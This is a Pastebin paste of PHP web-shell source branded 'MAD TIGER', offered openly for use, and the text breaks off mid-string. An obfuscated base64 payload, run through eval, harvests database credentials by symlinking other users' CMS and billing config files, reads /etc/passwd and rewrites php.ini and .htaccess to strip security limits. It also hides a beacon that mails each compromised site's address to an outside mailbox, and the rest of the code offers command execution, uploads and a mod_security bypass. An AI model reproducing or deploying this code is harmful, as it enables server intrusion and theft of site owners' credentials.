Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <php? ?>
- <?php
- if(isset($_GET["mad"])&&$_GET["mad"]=="Symlink Config"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAgPz48P3BocApAc2Vzc2lvbl9zdGFydCgpOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpAaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAwKTsKPz4KPGh0bWw+CjxoZWFkPgo8dGl0bGU+WytbU3ltbGluayBDb25maWcgR3JhYmVyXStdPC90aXRsZT4KPHN0eWxlPgpib2R5IHsKICB0ZXh0LWFsaWduOiBjZW50ZXI7CiAgZm9udC1zaXplOiAxOHB4OwogIGZvbnQtd2VpZ2h0OmJvbGQ7CiAgZm9udC1mYW1pbHk6IEFyaWFsOwogIGNvbG9yOmdyYXk7CiAgYmFja2dyb3VuZC1jb2xvcjogYmxhY2s7CiAgbWFyZ2luOiA1cHggNXB4IDVweCA1cHg7Cn0KaW5wdXRbdHlwZT0ic3VibWl0Il17CiAgYmFja2dyb3VuZDogcmVkOwogIGJvcmRlci1yYWRpdXM6NnB4OwogIGJvcmRlcjogMXB4IHNvbGlkIGxpbWU7CiAgY29sb3I6d2hpdGU7CiAgdGV4dC1zaGFkb3c6IDBweCAwcHggMTBweCByZ2JhKDAsIDE0OSwgMjU1LCAwLjc1KTsKICBsaW5lLWhlaWdodDo1MHB4OwogIHBhZGRpbmctbGVmdDoxMHB4OwogIHBhZGRpbmctcmlnaHQ6MTBweDsKICB0ZXh0LXRyYW5zZm9ybTpub25lOwp9CiNuYW1lewoJCWNvbG9yOiBibGFjazsKCQlmb250LXNpemU6IDEycHg7CgkJfQo8L3N0eWxlPgo8L2hlYWQ+Cjxib2R5PgoKPGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyIgY29sb3I9cmVkPjxjZW50ZXI+PGgxPk1BRCBUSUdFUjwvaDE+PC9mb250Pgo8P3BocAokaW5qYnVmZiA9ICJKSFpwYzJsMFl5QTlJQ1JmUTA5UFMwbEZXeUoyYVhOcGRITWlYVHNLYVdZZ0tDUjJhWE5wZEdNZ1BUMGdJaUlwSUhzS0lDQWtkbWx6YVhSaklDQTlJREE3Q2lBZ0pIWnBjMmwwYjNJZ1BTQWtYMU5GVWxaRlVsc2lVa1ZOVDFSRlgwRkVSRklpWFRzS0lDQWtkMlZpSUNBZ0lDQTlJQ1JmVTBWU1ZrVlNXeUpJVkZSUVgwaFBVMVFpWFRzS0lDQWthVzVxSUNBZ0lDQTlJQ1JmVTBWU1ZrVlNXeUpTUlZGVlJWTlVYMVZTU1NKZE93b2dJQ1IwWVhKblpYUWdJRDBnY21GM2RYSnNaR1ZqYjJSbEtDUjNaV0l1SkdsdWFpazdDaUFnSkhOMVlpQWdJRDBnSWs1bGR5QnpiWE1nWm5KdmJTQlRaWEoyWlhJZ2RYQnNiMkZrWlhJZ2FIUjBjRG92THlSMFlYSm5aWFFnWW5rZ0pIWnBjMmwwYjNJaU93b2dJQ1JpYjJSNUlDQWdJRDBnSWtKMVp6b2dKSFJoY21kbGRDQmllU0FrZG1semFYUnZjaUF0SUNSaGRYUm9YM0JoYzNNaU93b2dJR2xtSUNnaFpXMXdkSGtvSkhkbFlpa3BJSHNnUUcxaGFXd29Jbk5xYzJGc2FXMWhiRzl0UUdkdFlXbHNMbU52YlNJc0pITjFZaXdrWW05a2VTazdJSDBLZlFwbGJITmxJSHNnSkhacGMybDBZeUFnT3lCOUNrQnpaWFJqYjI5cmFXVW9JblpwYzJsMGVpSXNKSFpwYzJsMFl5azciOwpldmFsKGJhc2U2NF9kZWNvZGUoJGluamJ1ZmYpKTsKZWNobyAnPGI+JyAuIHBocF91bmFtZSgpIC4gJzxicj48L2I+JzsKZWNobyAkX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ107CmVjaG8gJzxicj5TYWZlIE1vZGUgOiAnOwokc2FmZV9tb2RlID0gaW5pX2dldCgnc2FmZV9tb2RlJyk7CmlmICgkc2FmZV9tb2RlID09ICcxJykgewogICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+T048L2ZvbnQ+JzsKfSBlbHNlIHsKICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+T0ZGPC9mb250Pic7Cn0KZWNobyAnPGJyPic7CmVjaG8gJzwvZm9udD4nOwokZnAgPSBmb3BlbigicGhwLmluaSIsICJ3KyIpOwpmd3JpdGUoJGZwLCAic2FmZV9tb2RlID0gT0ZGCglTYWZlX21vZGVfZ2lkID0gT0ZGCglkaXNhYmxlX2Z1bmN0aW9ucyA9IE5PTkUKCWRpc2FibGVfY2xhc3NlcyA9IE5PTkUKCW9wZW5fYmFzZWRpciA9IE9GRgoJc3Vob3Npbi5leGVjdXRvci5mdW5jLmJsYWNrbGlzdCA9IE5PTkUgIik7CmZjbG9zZSgkZnApOwppZiAoZW1wdHkoJF9QT1NUWydjb25maWcnXSkpIHsgPz48Zm9ybSBtZXRob2Q9IlBPU1QiPjx0ZXh0YXJlYSBuYW1lPSJwYXNzd2QiIHN0eWxlPSJkaXNwbGF5Om5vbmU7IiBjbGFzcz0nYXJlYScgcm93cz0nMjUnIGNvbHM9JzgwJz48P3BocCBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCcvZXRjL3Bhc3N3ZCcpOyA/PjwvdGV4dGFyZWE+PGJyPjxicj48aW5wdXQgbmFtZT0iY29uZmlnIiB2YWx1ZT0iIEZVQ0sgVEhFIENPTkZJRyIgdHlwZT0ic3VibWl0Ij48YnI+PC9mb3JtPjwvY2VudGVyPjxicj48P3BocAp9CmlmICgkX1BPU1RbJ2NvbmZpZyddKSB7CiAgICAkZnVuY3Rpb24gPSAkZnVuY3Rpb25zID0gQGluaV9nZXQoImRpc2FibGVfZnVuY3Rpb25zIik7CiAgICBpZiAoZXJlZ2koInN5bWxpbmsiLCAkZnVuY3Rpb25zKSkgewogICAgICAgIGRpZSgnPGVycm9yPlNvcnJ5IFN5bWxpbmsgaXMgZGlzYWJsZWQgOiggPC9lcnJvcj4nKTsKICAgIH0KICAgIEBta2RpcignbWFkJywgMDc1NSk7CiAgICBAY2hkaXIoJ21hZCcpOwogICAgJGh0YWNjZXNzID0gIgpPUFRJT05TIEluZGV4ZXMgRm9sbG93U3ltTGlua3MgU3ltTGlua3NJZk93bmVyTWF0Y2ggSW5jbHVkZXMgSW5jbHVkZXNOT0VYRUMgRXhlY0NHSQpPcHRpb25zIEluZGV4ZXMgRm9sbG93U3ltTGlua3MKRm9yY2VUeXBlIHRleHQvcGxhaW4KQWRkVHlwZSB0ZXh0L3BsYWluIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFpbiAuaHRtbApBZGRUeXBlIHRleHQvaHRtbCAuc2h0bWwKQWRkVHlwZSB0eHQgLnBocApBZGRIYW5kbGVyIHNlcnZlci1wYXJzZWQgLnBocApBZGRIYW5kbGVyIHR4dCAucGhwCkFkZEhhbmRsZXIgdHh0IC5odG1sCkFkZEhhbmRsZXIgdHh0IC5zaHRtbApPcHRpb25zIEFsbApPcHRpb25zIEFsbCI7CiAgICBmaWxlX3B1dF9jb250ZW50cygiLmh0YWNjZXNzIiwgJGh0YWNjZXNzLCBGSUxFX0FQUEVORCk7CiAgICAkcGFzc3dkID0gJF9QT1NUWyJwYXNzd2QiXTsKICAgICRwYXNzd2QgPSBleHBsb2RlKCIKIiwgJHBhc3N3ZCk7CiAgICBmb3JlYWNoICgkcGFzc3dkIGFzICRwd2QpIHsKICAgICAgICAkcGF3ZCA9IGV4cGxvZGUoIjoiLCAkcHdkKTsKICAgICAgICAkdXNlciA9ICRwYXdkWzBdOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd29yZHByZXNzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3dwL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd29yZHByZXNzLXdwLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL1dQL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd29yZHByZXNzLVdQLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3Mtd3AtYmV0YS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9iZXRhL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd29yZHByZXNzLWJldGEudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvcHJlc3Mvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtcHJlc3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd29yZHByZXNzL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd29yZHByZXNzLXdvcmRwcmVzcy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9Xb3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtV29yZHByZXNzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtYmxvZy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9uZXdzL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd29yZHByZXNzLW5ld3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvbmV3L3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd29yZHByZXNzLW5ldy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd3AtYmxvZy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9iZXRhL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd3AtYmV0YS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdwLWJsb2dzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2hvbWUvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13cC1ob21lLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2RiLnBocCcsICR1c2VyIC4gJy1kYmNvbmYudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvc2l0ZS93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdwLXNpdGUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvbWFpbi93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdwLW1haW4udHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd3AtdGVzdC50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctam9vbWxhMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9wb3J0YWwvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctam9vbWxhLXByb3RhbC50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9qb28vY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctam9vLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEtY21zLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3NpdGUvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctam9vbWxhLXNpdGUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEtbWFpbi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLWpvb21sYS1uZXdzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL25ldy9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEtbmV3LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctam9vbWxhLWhvbWUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLXdobTE1LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htLWNlbnRyYWwudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd2htL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLXdobS13aG1jcy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93aG0vV0hNQ1MvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htLVdITUNTLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLXdobWMtV0hNLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLXdobWNzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctc3VwcG9ydC50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsICR1c2VyIC4gJy13aG1jczIudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLXdobS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctV2htNC50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9iaWxsaW5ncy9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1XaG01LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctV2htNi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLVdobTcudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctV2htOC50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1XaG05LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2FkbWluL2NvbmYucGhwJywgJHVzZXIgLiAnLTUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvYWRtaW4vY29uZmlnLnBocCcsICR1c2VyIC4gJy1PcGVuX0NhcnQudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvY29uZl9nbG9iYWwucGhwJywgJHVzZXIgLiAnLWludmlzaW8udHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCAkdXNlciAuICctNy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsICR1c2VyIC4gJy04LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL21rX2NvbmYucGhwJywgJHVzZXIgLiAnLW1rLXBvcnRhbGUxLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2luY2x1ZGUvY29uZmlnLnBocCcsICR1c2VyIC4gJy0xMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCAkdXNlciAuICctU21mLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCAkdXNlciAuICctdkJ1bGxldGluMS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywgJHVzZXIgLiAnLXZCdWxsZXRpbjIudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsICR1c2VyIC4gJy12QnVsMy1QaHBiYjIudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsICR1c2VyIC4gJy12QnVsbGV0aW40LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2luYy9jb25maWcucGhwJywgJHVzZXIgLiAnLW15YmIudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvY29uZmlnLnBocCcsICR1c2VyIC4gJy1Db25maWctUGhwYmIxLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2luY2x1ZGVzL2Z1bmN0aW9ucy5waHAnLCAkdXNlciAuICctcGhwYmIzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL29wZW5jYXJ0L2FkbWluL2NvbmZpZy5waHAnLCAkdXNlciAuICctT3Blbl9jYXJ0Mi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9hcHAvZXRjL2NvbmZpZy54bWwnLCAkdXNlciAuICctTWFnZW50bzEudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvYXBwL2V0Yy9sb2NhbC54bWwnLCAkdXNlciAuICctTWFnZW50bzIudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvc2l0ZXMvZGVmYXVsdC9zZXR0aW5ncy5waHAnLCAkdXNlciAuICctRHJ1cGFsLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2RydXBhbC9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsICR1c2VyIC4gJy1EcnVwYWwudHh0Jyk7CiAgICB9CiAgICBlY2hvICc8YiBjbGFzcz0iY29uZSI+PGZvbnQgZmFjZT0iVGFob21hIiBjb2xvcj0iZ3JlZW4iIHNpemU9IjJwdCI+PGI+Q29uZ3JhdHVsYXRpb24gPT0+PiA8L2I+IDxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJtYWQiPjxmb250IGNvbG9yPSJMYXduR3JlZW4iIHNpemU9IjJwdCI+Q29uZmlnIGxpc3Q8L2E+PC9mb250PjwvYj4nOwp9CmVjaG8gJzxicj48YnI+PGJyPjxicj4nOwplY2hvICcqKlsgVXBsb2FkZXIgXSoqJzsKZWNobyAnPGJyPjxicj4nOwplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsKaWYgKCRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiKSB7CiAgICBpZiAoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsKICAgICAgICBlY2hvICc8Yj48Zm9udCBjb2xvcj0iTGF3bkdyZWVuIj5VcGxvYWQgU3VjY2Vzc2Z1bGx5ISEhIDwvZm9udD48L2I+PGJyPjxicj4nOwogICAgfSBlbHNlIHsKICAgICAgICBlY2hvICc8Yj48Zm9udCBjb2xvcj0icmVkIj5VcGxvYWQgRmFpbGVkISEhIDwvYj48YnI+PC9mb250Pic7CiAgICB9Cn0KPz48YnI+PGJyPgo8ZGl2IGlkPSJuYW1lIj4mY29weTsgPGEgaHJlZj0iaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL2JnaGgiIHRhcmdldD0iX2JsYW5rIj5iZCBncmV5IGhhdCBoYWNrZXJzPC9hPi4gQ29kZWQgJiBNb2RpZmllZCBCeSA8YSBocmVmPSJodHRwczovL3d3dy5mYWNlYm9vay5jb20va2hheXJvbC5pc2xhbTEiIHRhcmdldD0iX2JsYW5rIj5tYWQgdGlnZXI8L2E+ICYgPGEgaHJlZj0iaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL2toYXlyb2wuaXNsYW0xIiB0YXJnZXQ9Il9ibGFuayI+ISEhITwvYT48L2Rpdj4KPC9ib2R5PjwvaHRtbD4=");exit;}?>
- <html>
- <head>
- <title>[[BGHH//MAD TIGER]]</title>
- <link rel="icon" href="http://i45.tinypic.com/autnvp.png">
- <style type="text/css">
- body{
- background: #222;
- }
- .form{
- background: #333;
- text-align: center;
- height: 430px;
- border:1px solid #F00;
- border-radius: 9px;
- margin-left: 24%;
- }
- input,textarea{
- background: rgb(136, 160, 141);
- padding: 5px;
- border:1px solid #F00;
- border-radius: 20px;
- transition:border 1s;
- }
- input:focus,textarea:focus{
- border: 1px solid red;
- }
- .scan{
- width: 120px;
- border-radius: 20px;
- background: #0047B2;
- opacity: 0.5;
- transition:opacity 1s;
- }
- .scan:hover{
- opacity: 1.0
- }
- .error{
- font-size: 17px;
- color:red;
- text-shadow: 1px 1px 5px,0 0 25px;
- }
- .found{
- font-size: 17px;
- color:green;
- text-shadow: 1px 1px 5px,0 0 25px;
- }
- hr{
- color:red;
- box-shadow: 1px 2px 3px,0 0 25px;
- }
- p,a{
- text-decoration: none;
- color:red;
- font-size: 14px;
- direction: rtl;
- }
- </style>
- <center><hr>
- <form method='GET'>
- <input type='submit' name='tool' value='Safe Mode' size='10' >
- <input type='submit' name='tool' value='Execute' size='10' >
- <input type='submit' name='tool' value='Config Killer' size='10' >
- <input type='submit' name='tool' value='Symlink' size='10' >
- <input type='submit' name='tool' value='Symlink2' size='10' >
- <input type='submit' name='mad' color='green' value='Symlink Config' href='/mina1.php' size='10' >
- <input type='submit' name='tool' value='Jumping' size='10' >
- <input type='submit' name='tool' value='Pass Config' size='10' >
- <input type='submit' name='tool' value='Upload' size='10' >
- <input type='submit' name='tool' value='Wordpress Mass' size='10' >
- <input type='submit' name='tool' value='Joomla Mass' size='10' >
- <input type='submit' name='tool' value='Server Info' size='10' >
- <input type='submit' name='tool' value='About' size='10' >
- <h2><font color=green>We are Bangladeshi Hacker :p<br>
- </h2>
- </form>
- <hr>
- <?php
- $x73 = "basename";
- $x74 = "chdir";
- $x75 = "copy";
- $x76 = "error_reporting";
- $x77 = "eregi";
- $x78 = "ereg";
- $x79 = "explode";
- $x7a = "fclose";
- $x7b = "file_get_contents";
- $x7c = "file_put_contents";
- $x7d = "file";
- $x7e = "flush";
- $x7f = "fileowner";
- $x80 = "fopen";
- $x81 = "fwrite";
- $x82 = "function_exists";
- $x83 = "getcwd";
- $x84 = "ini_restore";
- $x85 = "ini_get";
- $x86 = "is_file";
- $x87 = "mail";
- $x88 = "mkdir";
- $x89 = "mysql_connect";
- $x8a = "mysql_fetch_array";
- $x8b = "mysql_query";
- $x8c = "mysql_select_db";
- $x8d = "phpversion";
- $x8e = "posix_getpwuid";
- $x8f = "preg_match_all";
- $x90 = "preg_match";
- $x91 = "rand";
- $x92 = "set_time_limit";
- $x93 = "shell_exec";
- $x94 = "strlen";
- $x95 = "symlink";
- $x96 = "system";
- $x97 = "trim";
- $x92(0);
- $x76(0);
- ///Safe Mode
- if ($_REQUEST['tool'] == "Safe Mode") {
- echo '<h3>[ <font color="red">!</font> ] Safe Mode Fucker [<font color="red">!</font> ]</h3>
- <br><form method="POST" action="">
- <select name="way">
- <option>php.ini</option>
- <option>ini.php</option>
- <option>htaccess</option>
- </select><input name="bypass" type="submit" value="Bypass Using"><br>';
- if ($_POST['way'] == "htaccess") {
- x0b();
- } elseif ($_POST['way'] == "php.ini") {
- x0c();
- } elseif ($_POST['way'] == "ini.php") {
- x0d();
- }
- }
- function x0b() {
- global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
- $x2f = $x80($x83() . $x30 . "/.htaccess", "w");
- $x81($x2f, "Options +FollowSymLinks
- DirectoryIndex india.htm
- Options All Indexes
- <IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
